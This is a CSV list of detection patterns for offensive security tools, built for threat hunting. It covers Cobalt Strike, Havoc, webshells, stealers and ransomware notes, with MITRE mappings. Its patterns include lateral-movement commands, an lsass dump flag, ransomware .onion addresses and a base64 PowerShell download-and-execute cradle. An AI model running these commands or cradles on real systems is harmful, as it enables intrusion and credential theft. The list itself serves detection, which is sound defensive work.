"*jump psexec_psh*",".{0,1000}jump\spsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50171"
"*jump psexec64*",".{0,1000}jump\spsexec64.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50172"
"*jump winrm *",".{0,1000}jump\swinrm\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50173"
"*jump winrm*",".{0,1000}jump\swinrm.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50174"
"*jump-exec psexec *",".{0,1000}jump\-exec\spsexec\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","50175"
"*jump-exec scshell*",".{0,1000}jump\-exec\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","50176"
"*JumpSession_BOF-main*",".{0,1000}JumpSession_BOF\-main.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","50177"
"*JunctionFolder.exe*",".{0,1000}JunctionFolder\.exe.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","50178"
"*--just-clean*cleaning/to_clean.txt*",".{0,1000}\-\-just\-clean.{0,1000}cleaning\/to_clean\.txt.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","50179"
"*-just-dc-user not compatible in LOCAL mode*",".{0,1000}\-just\-dc\-user\snot\scompatible\sin\sLOCAL\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50180"
"*-just-dc-user switch is not supported in VSS mode*",".{0,1000}\-just\-dc\-user\sswitch\sis\snot\ssupported\sin\sVSS\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50181"
"*jweny/zabbix-saml-bypass-exp*",".{0,1000}jweny\/zabbix\-saml\-bypass\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","N/A","1","93","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z","50182"
"*jwqpucwiolhmivnqt7qwroezymksxfjsbj6pmg2lnnglqpoe26cwnryd.onion*",".{0,1000}jwqpucwiolhmivnqt7qwroezymksxfjsbj6pmg2lnnglqpoe26cwnryd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50183"
"*jwt_tool*",".{0,1000}jwt_tool.{0,1000}","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","N/A","10","5765","701","2024-08-01T19:15:50Z","2017-01-23T21:13:50Z","50184"
"*-K lsass_loot*",".{0,1000}\-K\slsass_loot.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50186"
"*-k -no-pass -p '' --auth-method kerberos*",".{0,1000}\-k\s\-no\-pass\s\-p\s\'\'\s\-\-auth\-method\skerberos.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50187"
"*K07MLUosSSzOyM+OycvMzsjM4eUCAA==*",".{0,1000}K07MLUosSSzOyM\+OycvMzsjM4eUCAA\=\=.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","50188"
"*K1W1F01D3r(*",".{0,1000}K1W1F01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50189"
"*K1W1F113(*",".{0,1000}K1W1F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50190"
"*k4yt3x/orbitaldump*",".{0,1000}k4yt3x\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","50191"
"*k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion*",".{0,1000}k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50192"
"*K8_CS_*.rar*",".{0,1000}K8_CS_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","50193"
"*k8gege.org/*",".{0,1000}k8gege\.org\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50194"
"*k8gege/Ladon*",".{0,1000}k8gege\/Ladon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50195"
"*K8Ladon.sln*",".{0,1000}K8Ladon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50196"
"*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*",".{0,1000}KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","50197"
"*KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA*",".{0,1000}KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#base64","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","50198"
"*kali-*.deb*",".{0,1000}kali\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50200"
"*kali-anonsurf*",".{0,1000}kali\-anonsurf.{0,1000}","offensive_tool_keyword","kali-anonsurf","Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.","T1568 - T1102 - T1055 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Und3rf10w/kali-anonsurf","1","1","#linux","N/A","N/A","10","1681","478","2025-02-17T03:54:56Z","2015-08-19T04:57:16Z","50201"
